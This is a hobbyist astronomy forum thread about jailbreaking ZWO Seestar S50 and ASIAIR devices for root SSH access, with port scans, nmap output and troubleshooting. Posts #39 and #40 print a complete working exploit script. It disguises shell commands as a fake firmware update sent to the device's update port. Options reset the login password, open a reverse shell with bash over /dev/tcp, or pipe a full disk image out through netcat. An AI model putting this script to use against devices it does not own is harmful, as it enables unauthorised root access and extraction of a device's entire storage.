Jump to content

  •  

CNers have asked about a donation box for Cloudy Nights over the years, so here you go. Donation is not required by any means, so please enjoy your stay.

Photo

Seestar S50/ASIAIR Jailbreak + SSH

Software
  • Please log in to reply
177 replies to this topic

#26 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 01:46 PM

Stephanie,

 

Assuming those are all the open ports you may want to simply change the port in the script like I have listed in post #23. I don't know what you used to scan it, I am using MobaXterm on Windows and scanning the ASIAIR Pro with the stock ASIAIR_PRO_OS_V1.4.zip from their site and see the following open ports

 

FIRMWARE 4.35

- Port #22 (ssh):  listening
- Port #139 (netbios-ssn):  listening
- Port #445 (microsoft-ds):  listening
- Port #4030:  listening
- Port #4040:  listening
- Port #4350:  listening
- Port #4360:  listening
- Port #4400:  listening
- Port #4500:  listening
- Port #4700:  listening
- Port #4800:  listening
- Port #8888:  listening

 

What is inserting with the newer update they have the following ports open

 

FIRMWARE 10.74

- Port #22 (ssh):  listening
- Port #139 (netbios-ssn):  listening
- Port #445 (microsoft-ds):  listening
- Port #4030:  listening
- Port #4040:  listening
- Port #4350:  listening
- Port #4360:  listening
- Port #4400:  listening
- Port #4500:  listening
- Port #4700:  listening
- Port #4800:  listening
- Port #4801:  listening
- Port #8888:  listening

 

What I wanted to share in this post was the history command from the stock ASIAIR_PRO_OS_V1.4.zip image.

 

https://pastebin.com/31189rxq

Dear Viking1,

Thanks to have take the time to respond. I have no doubt that all you describe is functionnal on ASIAIR Pro.

Unfortunately, I guess there is a misunderstanding in the subject of this treat. This treat is talking about Seestar S50 from ZWO, which is a complete scope based partially on ASIAIR ... but this particular scope does not have a complete ASIAIR inside !!  So, the answers that has yet been written does not respond to the users like me, owning a Seestar and not an ASIAIR. The jailbreak created was done for the Seestar (and I have no doubt that it may work also on ASIAIR), but as the scope software has been restricted in the functionalyties, some ports have been closed by ZWO to avoid us to play "underground" ... I try to find another solution to jailbreak it.

Kind regards,

Stephane.



#27 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 02:08 PM

Dear Viking1,

Thanks to have take the time to respond. I have no doubt that all you describe is functionnal on ASIAIR Pro.

Unfortunately, I guess there is a misunderstanding in the subject of this treat. This treat is talking about Seestar S50 from ZWO, which is a complete scope based partially on ASIAIR ... but this particular scope does not have a complete ASIAIR inside !!  So, the answers that has yet been written does not respond to the users like me, owning a Seestar and not an ASIAIR. The jailbreak created was done for the Seestar (and I have no doubt that it may work also on ASIAIR), but as the scope software has been restricted in the functionalyties, some ports have been closed by ZWO to avoid us to play "underground" ... I try to find another solution to jailbreak it.

Kind regards,

Stephane.

Stephane,

 

No, I completely understand you have the Seestar, what I was saying is if you edit the run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw ports open of TCP139 and UPD 137 / 138 /1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There maybe different ports open and if not one of those ports you found may work.



#28 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:14 PM

Stephane,

 

No, I completely understand you have the Seestar, what I was saying is if you edit the run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw ports open of TCP139 and UPD 137 / 138 /1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There maybe different ports open and if not one of those ports you found may work.

Thank you , I will try ... and if any, will post back here for all other users. Let's hope ... :)

KR.


  • joeytroy likes this

#29 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:26 PM

Stephane,

 

No, I completely understand you have the Seestar, what I was saying is if you edit the run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw ports open of TCP139 and UPD 137 / 138 /1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There maybe different ports open and if not one of those ports you found may work.

I did use "netstat -a" in a cmd window under windows10.



#30 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:35 PM

Stephane,

 

No, I completely understand you have the Seestar, what I was saying is if you edit the run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw ports open of TCP139 and UPD 137 / 138 /1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There maybe different ports open and if not one of those ports you found may work.

  Port #139 (netbios-ssn): Listening

Port #445 (microsoft-ds): listening

Port #6000 (x11 :0): listening

That's all folk's .......



#31 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:40 PM

tryed with port 445 and get:

D:\Astro\Seestar\Jailbreak>python run_jailbreak.py 10.0.0.93
Traceback (most recent call last):
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 59, in <module>
    begin_update(sys.argv[1], JAILBREAK_FILE)
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 41, in begin_update
    print('Got: ' + recv_all(s))
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 16, in recv_all
    chunk = sock.recv(1024)
ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host

seem "bad luck" .....



#32 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 03:53 PM

I did use "netstat -a" in a cmd window under windows10.

I would recommend installing MobaXterm and scanning it directly https://mobaxterm.mo...t/download.html. Once installed go to  Tools < Network scan once you see your seestar click on the deep scan and it will scan all ports. This is assuming you have your seestar connected to your local network.



#33 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 04:02 PM

I would recommend installing MobaXterm and scanning it directly https://mobaxterm.mo...t/download.html. Once installed go to  Tools < Network scan once you see your seestar click on the deep scan and it will scan all ports. This is assuming you have your seestar connected to your local network.

Exactely what I  have done (did test your software), and only 3 ports. Did try the jailbreak on port 445 and not working.



#34 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 04:04 PM

here is a capture screen:

Attached Thumbnails

  • Capture.JPG

Edited by Artimon, 07 January 2024 - 04:04 PM.


#35 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 04:38 PM

here is a capture screen:

Bummer....yeah looks like they did something to lock it down I am sure after seeing this post lol.gif



#36 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 08 January 2024 - 10:56 AM

FIRST OF ALL, THIS IS ALL ESSENTIALLY ONE GIANT HACK. IT HAS WORKED FOR ME BUT IT COULD BRICK YOUR DEVICE, OR WORSE. THIS IS FOR DEVELOPERS ONLY. IF YOU AREN'T FAMILIAR WITH SSH OR LINUX, DON'T USE THIS!

Hi everyone,

With the release of ZWO's new Seestar S50, I'm finally releasing a tool I've been using internally to gain root SSH access to both my Seestar and ASIAIR devices. I was originally hoping that ZWO would reduce their rampant open source software license violations and vendor lock-in, but it's only gotten worse. This has made me decide to create a completely FOSS integrated astrophotography solution that will totally replace their software while still leveraging the ASI hardware. I intend to release this project free of charge to the astronomical community shortly.

In the meantime, I am providing this jailbreak so that others can explore their ASIAIR device without the need of physically opening it and soldering on UART headers. To run it, all you need is a machine running a reasonably new Python 3 as well as the archive attached to this post.

[Current jailbreak release]

Run jailbreak:

python run_jailbreak.py [IP_ADDRESS_OF_DEVICE]
Connect to Seestar/ASIAIR:
ssh pi@[IP_ADDRESS_OF_DEVICE]
The password for SSH will be "raspberry" (no quotes) if the jailbreak ran successfully. You can access the root account via "sudo".


#37 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 08 January 2024 - 11:14 AM

Oh my!

 

Thank you, thank you!

 

I have for the longest time trying to tap into ASI Air and Seestar's communication channel. A member in my group just led me to your original post today and my jaw just dropped.

 

I don't know how ZWO can leverage so many open source packages yet sell 2 completely closed system with no programmatic access. 

 

I started in an underground Facebook group called Smart Telescope Underworld that focuses on sharing ideas.on how to improve these telescopes with hacks and modifications. I figured out how to run Seestar in equatorial mode and to do spectroscopy, and shared the steps there. Others have broken into the case and start modifying the internal part. My co-admin now is trying to access the electronics. You and people like you will be awesome additions to the group. Please check it out.

 

https://www.facebook...373417055173095

 

Kai


Edited by kaicyung, 08 January 2024 - 11:15 AM.

  • cmahar likes this

#38 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 09 January 2024 - 12:39 PM

This also works on the Mini as well per the following instructions

 

https://www.cloudyni...ssh/?p=13177790

 

I used a USB Network Dongle to connect to the device with a network cable instead of doing the Wi-Fi station mode to my home network. Just plugged it in and it worked perfectly.

 

miniasiair-network.jpg



#39 Oxofrimbl

Oxofrimbl

    Lift Off

  • -----
  • Posts: 10
  • Joined: 09 Jan 2024

Posted 09 January 2024 - 01:51 PM

Hey Folks, flowerred.gif

 

I did spend some time, and the port indeed changed on the Asiair, however as indicated it just slipped to 4360 instead 4361. 

I took the freedom and updated the script. Additionally i streamlined the execution and other usecases.

 

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip
# Seestar/ASIAIR jailbreak by @joshumax
# Licensed in the public domain
# Source Thread: https://www.cloudynights.com/topic/900861-seestar-s50asiair-jailbreak-ssh/
# Mod by Oxofrimbl to handle differnt ports and added a backup and reverse shell option without modifying the ASIAIR

import socket
import os
import hashlib
import sys
import tempfile
import tarfile
import argparse
import socket


JAILBREAK_FILE = 'jailbreak.tar.bz2'

JAILBREAK_SCRIPT = """
sudo mount -o remount,rw /

echo "pi:raspberry" | sudo chpasswd
sync

sudo mount -o remount,ro /
"""

def recv_all(sock):
    text = ''

    while True:
        chunk = sock.recv(1024)
        text += chunk.decode()

        if not chunk or chunk.decode().endswith('\n'):
            break

    return text


def begin_update(address, file):
    s = socket.socket()
    s_ota = socket.socket()

    file_contents = open(file,'rb').read()
    json_str = '{{"id":1,"method":"begin_recv","params":[{{"file_len":{file_len},"file_name":"air","run_update":true,"md5":"{md5}"}}]}}\r\n'
    fsize = os.path.getsize(file)
    fmd5 = hashlib.md5(file_contents).hexdigest()
    json_str = json_str.format(file_len = fsize, md5 = fmd5)

    # Connect to OTA file socket first
    try:
        print("Try to connect to binary port  4361 (legacy?)")
        s_ota.connect((address, 4361))
    except ConnectionRefusedError:
        try:
            print("Connection to 4361 failed, try to connect to binary port 4360 (new?)")
            s_ota.connect((address, 4360))
        except ConnectionRefusedError:
            print("Cannot connect to binary port")
            sys.exit(-2)

    # Then connect to OTA command socket
    s.connect((address, 4350))

    print('Got: ' + recv_all(s))

    print('Sending RPC: {rpc}'.format(rpc = json_str))
    s.sendall(json_str.encode())

    print('Got back: ' + recv_all(s))

    s_ota.sendall(file_contents)

    s_ota.close()
    s.close()


def create_patch(script_content=""):
    with tempfile.NamedTemporaryFile (mode='w+b',delete=False) as tf:
        #Create reverse shell to client
        tf.write(b'#!/bin/bash\n')
        tf.write(bytes(script_content,'UTF-8'))
        tf.close()
        #Create Fake update Package
        with tarfile.open(JAILBREAK_FILE, "w:bz2") as tarhandle:
            tarhandle.add(tf.name, "update_package.sh")

if __name__ == '__main__':
    create_patch()
    parser = argparse.ArgumentParser()
    parser.add_argument('--ip', required=True, help="Set the asiair ip")
    hostname = socket.gethostname()
    client_ip_adress  = socket.gethostbyname(hostname)

    parser.add_argument('--client-ip', help="Client IP in case this client dosnt serve as 'master'", default=client_ip_adress)
    parser.add_argument('--shell', help="Enter IP for reverse-shell connection 'nc -l 4242'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--backup', help="Enter IP for full system backup, client: 'nc -l 4444 | dd of=asiair.img'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--jailbreak', help="PErform a Jailbreak by setting username:password for ssh to pi:raspberry",action=argparse.BooleanOptionalAction)
    args = parser.parse_args()
    client_ip_adress = args.client_ip

    if(not (args.jailbreak or args.backup  or args.shell)):
       print("Please use -h either, perform a jailbreak (rooting device), backup for a TCP port of the full image, or get a reverse shell to a target ip")
       sys.exit(-1)

    if(args.shell):
        create_patch(f"bash -i >& /dev/tcp/{client_ip_adress}/4242 0>&1")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.backup):
        create_patch(f"sudo dd if=/dev/mmcblk0 bs=1M | nc {client_ip_adress} 4444")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.jailbreak):
        create_patch(JAILBREAK_SCRIPT)
        begin_update(args.ip, JAILBREAK_FILE)

Hope tats useful to anyone.waytogo.gif


Edited by Oxofrimbl, 09 January 2024 - 01:53 PM.

  • lambermo and edjuh like this

#40 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 09 January 2024 - 02:30 PM

Hey Folks, flowerred.gif

 

I did spend some time, and the port indeed changed on the Asiair, however as indicated it just slipped to 4360 instead 4361. 

I took the freedom and updated the script. Additionally i streamlined the execution and other usecases.

 

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip
# Seestar/ASIAIR jailbreak by @joshumax
# Licensed in the public domain
# Source Thread: https://www.cloudynights.com/topic/900861-seestar-s50asiair-jailbreak-ssh/
# Mod by Oxofrimbl to handle differnt ports and added a backup and reverse shell option without modifying the ASIAIR

import socket
import os
import hashlib
import sys
import tempfile
import tarfile
import argparse
import socket


JAILBREAK_FILE = 'jailbreak.tar.bz2'

JAILBREAK_SCRIPT = """
sudo mount -o remount,rw /

echo "pi:raspberry" | sudo chpasswd
sync

sudo mount -o remount,ro /
"""

def recv_all(sock):
    text = ''

    while True:
        chunk = sock.recv(1024)
        text += chunk.decode()

        if not chunk or chunk.decode().endswith('\n'):
            break

    return text


def begin_update(address, file):
    s = socket.socket()
    s_ota = socket.socket()

    file_contents = open(file,'rb').read()
    json_str = '{{"id":1,"method":"begin_recv","params":[{{"file_len":{file_len},"file_name":"air","run_update":true,"md5":"{md5}"}}]}}\r\n'
    fsize = os.path.getsize(file)
    fmd5 = hashlib.md5(file_contents).hexdigest()
    json_str = json_str.format(file_len = fsize, md5 = fmd5)

    # Connect to OTA file socket first
    try:
        print("Try to connect to binary port  4361 (legacy?)")
        s_ota.connect((address, 4361))
    except ConnectionRefusedError:
        try:
            print("Connection to 4361 failed, try to connect to binary port 4360 (new?)")
            s_ota.connect((address, 4360))
        except ConnectionRefusedError:
            print("Cannot connect to binary port")
            sys.exit(-2)

    # Then connect to OTA command socket
    s.connect((address, 4350))

    print('Got: ' + recv_all(s))

    print('Sending RPC: {rpc}'.format(rpc = json_str))
    s.sendall(json_str.encode())

    print('Got back: ' + recv_all(s))

    s_ota.sendall(file_contents)

    s_ota.close()
    s.close()


def create_patch(script_content=""):
    with tempfile.NamedTemporaryFile (mode='w+b',delete=False) as tf:
        #Create reverse shell to client
        tf.write(b'#!/bin/bash\n')
        tf.write(bytes(script_content,'UTF-8'))
        tf.close()
        #Create Fake update Package
        with tarfile.open(JAILBREAK_FILE, "w:bz2") as tarhandle:
            tarhandle.add(tf.name, "update_package.sh")

if __name__ == '__main__':
    create_patch()
    parser = argparse.ArgumentParser()
    parser.add_argument('--ip', required=True, help="Set the asiair ip")
    hostname = socket.gethostname()
    client_ip_adress  = socket.gethostbyname(hostname)

    parser.add_argument('--client-ip', help="Client IP in case this client dosnt serve as 'master'", default=client_ip_adress)
    parser.add_argument('--shell', help="Enter IP for reverse-shell connection 'nc -l 4242'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--backup', help="Enter IP for full system backup, client: 'nc -l 4444 | dd of=asiair.img'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--jailbreak', help="PErform a Jailbreak by setting username:password for ssh to pi:raspberry",action=argparse.BooleanOptionalAction)
    args = parser.parse_args()
    client_ip_adress = args.client_ip

    if(not (args.jailbreak or args.backup  or args.shell)):
       print("Please use -h either, perform a jailbreak (rooting device), backup for a TCP port of the full image, or get a reverse shell to a target ip")
       sys.exit(-1)

    if(args.shell):
        create_patch(f"bash -i >& /dev/tcp/{client_ip_adress}/4242 0>&1")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.backup):
        create_patch(f"sudo dd if=/dev/mmcblk0 bs=1M | nc {client_ip_adress} 4444")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.jailbreak):
        create_patch(JAILBREAK_SCRIPT)
        begin_update(args.ip, JAILBREAK_FILE)

Hope tats useful to anyone.waytogo.gif

Waouw !! Thanks a lot! My Seestar is recording North America NGC1499 at present time (At least one clear night in Belgium since weekSSS, and without moon!) but after (or tomorrow) will test this script. Awesome job done, many Thanks!!


  • Tribe_Of_Dan likes this

#41 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 10 January 2024 - 05:25 AM

For seestar hackers, I am trying to find the config entries in the xml file to were exposed during the "hidden menu" built. Specifically, the one to save all Junked Fits. I am using the latest firmware but I don't see a relevant entry for this config. Anyone has this info?

 

Kai



#42 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 03:53 AM

Can anyone tell me if the firmware images are part of the APK (in the case on Android)? Or is the firmware update/upgrade process yet-another workflow?
tia
mconsidine

#43 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 11 January 2024 - 07:38 AM

For seestar hackers, I am trying to find the config entries in the xml file to were exposed during the "hidden menu" built. Specifically, the one to save all Junked Fits. I am using the latest firmware but I don't see a relevant entry for this config. Anyone has this info?

 

Kai

Nevermind. Figured it out.



#44 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 08:35 AM

Can anyone tell me if the firmware images are part of the APK (in the case on Android)? Or is the firmware update/upgrade process yet-another workflow?
tia
mconsidine

Hello mconsidine, Firmware is not part of the apk software application. If any updated firmware is available for your seestar, the apk will compare the version of firmware installed on your device, and propose you to upgrade. You are never obliged to upgrade ( at present time, the software does nto block you if not up-2-date with firmware ... hope it will stay like this), but you might have incompatibilies if both are not adapted each to each. For the option of the 10/20/30 seconds subframes, it seem to be firmware dependant. Hope this may help. Kr. Stéphane.



#45 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 09:12 AM

Thanks. Fyi, I'm seeing open ports up in the 4000s beyond what's been posted. But revised .py jailbreak above is returning a message saying "binary port is not connected".

Anything I should look for in output of nmap that might I'd the right set of ports? 4350 and 4361 are shown as open, but not 4360.

Edited by mconsidine, 11 January 2024 - 09:13 AM.


#46 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 10:21 AM

Hey Folks, flowerred.gif

 

I did spend some time, and the port indeed changed on the Asiair, however as indicated it just slipped to 4360 instead 4361. 

I took the freedom and updated the script. Additionally i streamlined the execution and other usecases.

....

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip

Hope tats useful to anyone.waytogo.gif

Hi Oxofrimbl,

I did try your script on my seestar firmware v2.06 and did get this back. Do not know what to do with ......

 

"Got back:

Try to connect to binary port  6000 (legacy?)
Got:
Sending RPC: {"id":1,"method":"begin_recv","params":[{"file_len":264,"file_name":"air","run_update":true,"md5":"79a3831e7e6555f9c0335c824a1aa01b"}]}
"

 

... if you have any idea how to run into it as pi user?! ......

 

by the way, I have got found those ports:

 

Tkx,

Stephane.

Attached Thumbnails

  • Capture2.JPG

Edited by Artimon, 11 January 2024 - 10:24 AM.


#47 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 11:43 AM

Hmmm...

 

Attached Thumbnails

  • Capture.PNG


#48 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 12:54 PM

Hmmm...

Please, indicate also the firmware version, as from one to another, ports are not the same !! in my case, 2.06.



#49 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 01:09 PM

Right ... apologies for that.

App version is 1.13.1

Firmware is 2.06

Platform is Android

 

Going at it from Linux (Mint; Ubuntu) via nmap at the command line:

 

nmap -v -p 1-65535 -A 192.168.1.84
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 08:55 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating Ping Scan at 08:55
Scanning 192.168.1.84 [2 ports]
Completed Ping Scan at 08:55, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:55
Completed Parallel DNS resolution of 1 host. at 08:55, 0.00s elapsed
Initiating Connect Scan at 08:55
Scanning SeeStar (192.168.1.84) [65535 ports]
Discovered open port 80/tcp on 192.168.1.84
Discovered open port 445/tcp on 192.168.1.84
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 139/tcp on 192.168.1.84
Discovered open port 1935/tcp on 192.168.1.84
Discovered open port 4040/tcp on 192.168.1.84
Discovered open port 4701/tcp on 192.168.1.84
Discovered open port 4700/tcp on 192.168.1.84
Discovered open port 4350/tcp on 192.168.1.84
Discovered open port 4030/tcp on 192.168.1.84
Discovered open port 4361/tcp on 192.168.1.84
Discovered open port 4400/tcp on 192.168.1.84
Discovered open port 4500/tcp on 192.168.1.84
Discovered open port 4800/tcp on 192.168.1.84
Discovered open port 4801/tcp on 192.168.1.84
Completed Connect Scan at 08:55, 5.88s elapsed (65535 total ports)
Initiating Service scan at 08:55
Scanning 15 services on SeeStar (192.168.1.84)

 

mconsidine



#50 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 01:23 PM

Right ... apologies for that.

App version is 1.13.1

Firmware is 2.06

Platform is Android

 

Going at it from Linux (Mint; Ubuntu) via nmap at the command line:

 

nmap -v -p 1-65535 -A 192.168.1.84
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 08:55 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating Ping Scan at 08:55
Scanning 192.168.1.84 [2 ports]
Completed Ping Scan at 08:55, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:55
Completed Parallel DNS resolution of 1 host. at 08:55, 0.00s elapsed
Initiating Connect Scan at 08:55
Scanning SeeStar (192.168.1.84) [65535 ports]
Discovered open port 80/tcp on 192.168.1.84
Discovered open port 445/tcp on 192.168.1.84
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 139/tcp on 192.168.1.84
Discovered open port 1935/tcp on 192.168.1.84
Discovered open port 4040/tcp on 192.168.1.84
Discovered open port 4701/tcp on 192.168.1.84
Discovered open port 4700/tcp on 192.168.1.84
Discovered open port 4350/tcp on 192.168.1.84
Discovered open port 4030/tcp on 192.168.1.84
Discovered open port 4361/tcp on 192.168.1.84
Discovered open port 4400/tcp on 192.168.1.84
Discovered open port 4500/tcp on 192.168.1.84
Discovered open port 4800/tcp on 192.168.1.84
Discovered open port 4801/tcp on 192.168.1.84
Completed Connect Scan at 08:55, 5.88s elapsed (65535 total ports)
Initiating Service scan at 08:55
Scanning 15 services on SeeStar (192.168.1.84)

 

mconsidine

OK, good to know. The difference between us, is that you did connect your SS on your local network (192.168.x.x) Am I right? In my case, I did connect to it via 10.0.0.93, because my SS is hotspot. 

Then, could you connect to it and jailbreak it? if yes, after jailbreak, what did you with? Should be interesting for all of us ;)




CNers have asked about a donation box for Cloudy Nights over the years, so here you go. Donation is not required by any means, so please enjoy your stay.


Recent Topics





Also tagged with one or more of these keywords: Software



Cloudy Nights LLC
Cloudy Nights Sponsor: Astronomics